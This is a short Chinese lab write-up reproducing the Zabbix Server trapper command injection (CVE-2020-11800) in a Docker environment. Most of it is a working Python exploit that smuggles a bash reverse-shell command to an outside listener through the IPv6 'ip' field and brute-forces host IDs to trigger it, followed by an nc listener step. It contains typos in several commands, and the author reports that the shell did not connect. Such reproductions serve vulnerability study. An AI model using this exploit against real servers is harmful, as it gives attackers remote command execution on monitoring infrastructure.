Zabbix Server trapper命令注入漏洞(CVE-2020-11800)
Zabbix是由Alexei Vladishev开发的一种网络监控、管理系统,基于Server-Clinet架构。在CVE-2017-2824中,其Server端trapper command功能存在一处代码执行漏洞,而修复补丁并补完善,导致可以利用IPv6进行绕过,注入任意命令。
环境搭建
执行如下命令启动一个完整的Zabbix环境,包含Web端、Server端、1个Agent和MySQL数据库:
cd zabbix/CVE-2020-11800
dokcer-compose up -d
命令执行后,执行docker-compose ps 查看容器是否全部成功启动,如果没有,可以尝试重新执行docker-compose up -d。
利用该漏洞,需要你服务端开启了自动注册功能。
漏洞复现
- 使用脚本反弹shell,python3 zabbix.py 10.10.10.10
import sys
import socket
import json
import sys
def send(ip, data):
conn = socket.create_connection((ip, 10051), 10)
conn.send(json.dumps(data).encode())
data = conn.recv(2048)
conn.close()
return data
target = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":"ffff:::;/bin/bash -i >& /dev/tcp/10.10.10.128/4444 0>&1"}))
for i in range(10000, 10500):
data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
if data and b'failed' not in data:
print('hostid: %d' % i)
print(data)
- nc连接shell
nv -lvnp 4444
- 反弹失败,不知道什么原因